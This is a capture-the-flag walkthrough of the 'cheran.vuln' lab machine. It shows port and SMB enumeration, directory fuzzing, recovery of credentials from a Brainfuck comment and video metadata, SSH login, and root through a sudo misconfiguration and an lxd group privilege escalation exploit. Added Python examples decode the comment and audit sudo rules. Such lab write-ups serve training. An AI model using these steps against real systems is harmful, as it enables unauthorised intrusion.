First step: port reconnaissance with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon cheran.vuln

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤
WWA for the #15 !

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-13 14:34 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Initiating ARP Ping Scan at 14:34
Scanning cheran.vuln (10.0.2.9) [1 port]
Completed ARP Ping Scan at 14:34, 0.01s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:34
Scanning cheran.vuln (10.0.2.9) [65535 ports]
Discovered open port 22/tcp on 10.0.2.9
Discovered open port 445/tcp on 10.0.2.9
Discovered open port 80/tcp on 10.0.2.9
Discovered open port 139/tcp on 10.0.2.9
Completed SYN Stealth Scan at 14:34, 1.40s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.9.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Nmap scan report for cheran.vuln (10.0.2.9)
Host is up (0.000058s latency).
Not shown: 65531 closed tcp ports (reset)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 08:00:27:A6:29:55 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 14:34
Completed NSE at 14:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.57 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

[+] [smb]
SMB         cheran.vuln     445    UBUNTU           [*] Windows 6.1 (name:UBUNTU) (domain:) (signing:False) (SMBv1:True)
[+] Guest session       IP: cheran.vuln:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (ubuntu server (Samba, Ubuntu))

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (ubuntu server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            UBUNTU
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\cheran.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

[+] [fuzzin server]
http://cheran.vuln [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.9], Open-Graph-Protocol[article][166816780017302], Script[text/javascript], Title[A complete list of Chera Rulers and their contribution]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jul 13 14:34:12 2022
URL_BASE: http://cheran.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://cheran.vuln:80/ ----
+ http://cheran.vuln:80/admin.php (CODE:200|SIZE:100)                                                                                                                                             
==> DIRECTORY: http://cheran.vuln:80/images/                                                                                                                                                      
+ http://cheran.vuln:80/index.html (CODE:200|SIZE:21614)                                                                                                                                          
+ http://cheran.vuln:80/robots.txt (CODE:200|SIZE:21)                                                                                                                                             
+ http://cheran.vuln:80/server-status (CODE:403|SIZE:276)                                                                                                                                         
==> DIRECTORY: http://cheran.vuln:80/users/                                                                                                                                                       
==> DIRECTORY: http://cheran.vuln:80/youtube/                                                                                                                                                     
                                                                                                                                                                                                  
-----------------
END_TIME: Wed Jul 13 14:34:13 2022
DOWNLOADED: 4612 - FOUND: 4

recon reports four open TCP ports: 22 for SSH, 80 for HTTP, and 139 and 445 for SMB

┌──(root@ghost)-[/home/ghost]
└─# curl -s cheran.vuln/users/ | sed -e 's/<[^>]*>//g'
  Index of /users
 
 
Index of /users
  
   NameLast modifiedSizeDescription
   
Parent Directory   -  
Rajasimha.html2020-07-29 13:02  1.0K 
cheran.html2020-07-29 12:19  176  
   

Apache/2.4.29 (Ubuntu) Server at cheran.vuln Port 80
┌──(root@ghost)-[/home/ghost]
└─# curl -s cheran.vuln/users/Rajasimha.html
Rajasimha



Find me...

<!--

+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.<+
+++++ ++[-> ----- ---<] >---- ---.< +++[- >---< ]>--- .<+++ +[->- ---<]
>---. ---.+ ++.-- -.<++ +++++ +[->+ +++++ ++<]> +++++ +++++ .<+++ +[->+
+++<] >++++ .+.<+ ++[-> +++<] >+.<+ +++++ +++[- >---- ----- <]>-- .<+++
+++++ [->++ +++++ +<]>+ +++++ +++.< +++[- >+++< ]>+.< +++++ ++++[ ->---
----- -<]>- -.<++ +++++ ++[-> +++++ ++++< ]>+++ .<+++ [->-- -<]>- --.--
-.<++ +++++ +[->- ----- --<]> ----- .<+++ ++++[ ->+++ ++++< ]>+++ +.<++
+++[- >++++ +<]>+ ++++. <+++[ ->--- <]>-- ---.< +++[- >+++< ]>+++ +.---
-.<++ +[->- --<]> ----. <+++[ ->+++ <]>++ +.--- ----- .<+++ ++++[ ->---
----< ]>--- ---.. .<+++ ++[-> ----- <]>-- ----- -.--- .<

-->

The comment is Brainfuck-encoded; decoded, it means: This is the Username...
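
As an added example (not part of the original write-up), a small Brainfuck interpreter in Python that decodes HTML comments like the one above. The sample embeds only the opening of that comment, and the function names are this example's own.

```python
import re
BF_OPS = set("+-<>[].,")

def run_brainfuck(code, max_steps=1_000_000):
    """Run a Brainfuck program (input ',' is ignored) and return its output."""
    prog = [c for c in code if c in BF_OPS]
    jump, stack = {}, []
    for i, c in enumerate(prog):            # pair up the brackets once
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ]")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError("unmatched [")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):              # step limit: untrusted input cannot hang us
        if pc >= len(prog):
            return "".join(out)
        c = prog[pc]
        if c in "+-":
            tape[ptr] = (tape[ptr] + (1 if c == "+" else -1)) % 256
        elif c in "<>":
            ptr += 1 if c == ">" else -1
            if not 0 <= ptr < len(tape):
                raise IndexError("tape pointer out of range")
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif (c == "[" and tape[ptr] == 0) or (c == "]" and tape[ptr]):
            pc = jump[pc]                   # jump to the matching bracket
        pc += 1
    raise RuntimeError("step limit exceeded")

def decode_comments(html):
    """Decode HTML comments made up only of Brainfuck ops and whitespace."""
    bodies = re.findall(r"<!--(.*?)-->", html, flags=re.S)
    return [run_brainfuck(b) for b in bodies
            if "." in b and set(b) <= BF_OPS | set(" \t\r\n")]

# Constructed sample: page text plus the opening of the comment shown above.
SAMPLE_PAGE = """Find me... <!-- site navigation -->
<!--
+++++ +++[- >++++ ++++< ]>+++ .<+++ +++[- >++++ ++<]> +++++ +++.- .----
---.< +++[- >+++< ]>++. <++++ [->-- --<]> -.<++ ++[-> ++++< ]>+++ .-.
-->"""

if __name__ == "__main__":
    print(decode_comments(SAMPLE_PAGE))
```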

After a bit of scraping and visiting the YouTube links, we found https://www.youtube.com/watch?v=jQqbhtw7Faw (Cheran_Vulnhub_User_Password). Analyzing its source code, we get <meta name="description" content="Cheran_Vulnhub_User_PasswordPassword : k4rur">

┌──(root@ghost)-[/home/ghost]
└─# ssh Rajasimha@cheran.vuln
The authenticity of host 'cheran.vuln (10.0.2.9)' can't be established.
ED25519 key fingerprint is SHA256:bIEC4Rwz61rgp7mqsqUIOiHq+JZ68ACsyG6CaAakEaU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'cheran.vuln' (ED25519) to the list of known hosts.
Rajasimha@cheran.vuln's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu Jul 14 00:56:03 IST 2022

  System load:  0.02              Processes:             102
  Usage of /:   31.4% of 9.78GB   Users logged in:       0
  Memory usage: 15%               IP address for enp0s3: 10.0.2.9
  Swap usage:   0%

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

76 packages can be updated.
1 update is a security update.


*** System restart required ***
Last login: Wed Jul 29 20:04:15 2020 from 192.168.1.9
Rajasimha@ubuntu:~$

Logged in.

Rajasimha@ubuntu:~$ sudo -l
Matching Defaults entries for Rajasimha on ubuntu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User Rajasimha may run the following commands on ubuntu:
    (ALL, !root) /bin/bash

User Rajasimha can run /bin/bash as any user except root, so let's switch to the other user on the system

Rajasimha@ubuntu:~$ sudo -i -u cheran /bin/bash
[sudo] password for Rajasimha: 
cheran@ubuntu:~$ cat /etc/group | grep lxd
lxd:x:108:cheran
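
The two outputs above form a chain: a sudo rule that excludes only root still reaches an account in a root-equivalent group. As an added audit example (not from the original write-up), this Python check finds such chains from `sudo -l` output and `/etc/group` content. The group list, the simplified sudoers matching and all function names are assumptions of this example.

```python
import re
# Assumption: groups treated as root-equivalent on the host.
ROOT_EQUIVALENT_GROUPS = {"lxd", "docker", "disk"}
SHELLS = {"ALL", "/bin/sh", "/bin/bash"}

def group_members(group_text):
    """Parse /etc/group content into {group: set(members)}."""
    groups = {}
    for line in group_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) == 4:
            groups[fields[0]] = {m for m in fields[3].split(",") if m}
    return groups

def shell_targets(sudo_l_text, all_users):
    """Accounts the rules in `sudo -l` output allow a shell as (simplified)."""
    rule = re.compile(r"^\s*\(([^)]*)\)\s+(?:[A-Z]+:\s*)*(\S+)", re.M)
    targets = set()
    for runas, command in rule.findall(sudo_l_text):
        if command not in SHELLS:
            continue
        allowed = set()
        for entry in runas.split(":")[0].split(","):   # user part, left to right
            entry = entry.strip()
            if entry == "ALL":
                allowed |= set(all_users)
            elif entry.startswith("!"):
                allowed.discard(entry[1:])             # "!root" removes only root
            elif entry:
                allowed.add(entry)
        targets |= allowed
    return targets

def root_paths(sudo_l_text, group_text, all_users):
    """List the ways the audited user reaches root through these rules."""
    targets = shell_targets(sudo_l_text, all_users)
    paths = ["sudo -> root"] if "root" in targets else []
    for group, members in sorted(group_members(group_text).items()):
        if group in ROOT_EQUIVALENT_GROUPS:
            paths += [f"sudo -> {u} -> group {group}" for u in sorted(members & targets)]
    return paths

# Constructed sample built from the output shown above.
USERS = ["root", "Rajasimha", "cheran"]
GROUPS = "sudo:x:27:\nlxd:x:108:cheran\n"
SUDO_L = "User Rajasimha may run the following commands on ubuntu:\n    (ALL, !root) /bin/bash\n"

if __name__ == "__main__":
    print(root_paths(SUDO_L, GROUPS, USERS))
```

An empty result means no path was found under these assumptions; the fix for a hit is to name the permitted target accounts explicitly in the sudo rule and to remove ordinary users from root-equivalent groups.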

The user is in the lxd group, so it is time for privilege escalation. If you use searchsploit you will find S4vitar's lxd exploit (love to my exploit comrade, check out his awesome contributions), but I will use lxd-privesc-exploit.

┌──(root@ghost)-[/home/ghost]
└─# searchsploit lxd
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Ubuntu 18.04 - 'lxd' Privilege Escalation                                                                                                                        | linux/local/46978.sh
----------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
cheran@ubuntu:~$ git clone https://github.com/0bfxgh0st/lxd-privesc-exploit.git
Cloning into 'lxd-privesc-exploit'...
remote: Enumerating objects: 93, done.
remote: Counting objects: 100% (93/93), done.
remote: Compressing objects: 100% (90/90), done.
remote: Total 93 (delta 27), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (93/93), done.
cheran@ubuntu:~$ cd lxd-privesc-exploit
cheran@ubuntu:~/lxd-privesc-exploit$ bash lxd-privesc-exploit.sh
[+] Building lxd privesc exploit
Would you like to use LXD clustering? (yes/no) [default=no]: 
Do you want to configure a new storage pool? (yes/no) [default=yes]: 
Name of the new storage pool [default=default]: 
Name of the storage backend to use (btrfs, dir, lvm) [default=btrfs]: 
Create a new BTRFS pool? (yes/no) [default=yes]: 
Would you like to use an existing block device? (yes/no) [default=no]: 
Size in GB of the new loop device (1GB minimum) [default=15GB]: 
Would you like to connect to a MAAS server? (yes/no) [default=no]: 
Would you like to create a new local network bridge? (yes/no) [default=yes]: 
What should the new bridge be called? [default=lxdbr0]: 
What IPv4 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
What IPv6 address should be used? (CIDR subnet notation, “auto” or “none”) [default=auto]: 
Would you like LXD to be available over the network? (yes/no) [default=no]: 
Would you like stale cached images to be updated automatically? (yes/no) [default=yes] 
Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: 
To start your first container, try: lxc launch ubuntu:18.04

Image imported with fingerprint: 6660ba8332f9ae75637afe2e6713f1e257163aa6c7ae3c8e338392d117dcb7ba
Creating x0bfxgh0st
Device container added to x0bfxgh0st
~ # cat /mnt/root/root.txt



  Bow & Arrow                                (/,**                              
  %%/  /***********/(.Cheran Flag.)/*******////*/*                              
  /(,,                   /*****/((((//******/   //                              
  /(,               .,,                         /(                              
  /(,                */,                        /                               
  (#,               ,    ,,,                   ./                               
  (#              ,        ,,,                 //                               
  (#            ..        ,,,                  /(                               
  ##           .(,,,,,,,,,,,,,,,               /,                               
  ##             *        ,,                   *.                               
  ##              ,        ,,                  *                                
  ##               *    .,,,                  /*                                
  ##                **,                     /*                                  
  #%               ,,                *****                                      
  #%  **,    .*****************,                                                
  #%*.                                                                          
  %%   Congrats...                                                                         
  ##                                                                               
  ##                                                                           
  #(      Here is the Flag...                                                                   
  #*                                                                            
 .#*                                                                               
 .(*         Share your screenshot in telegram : https://t.me/joinchat/N06BGRSyCLUnOBsONd9fxg                                                                   
  *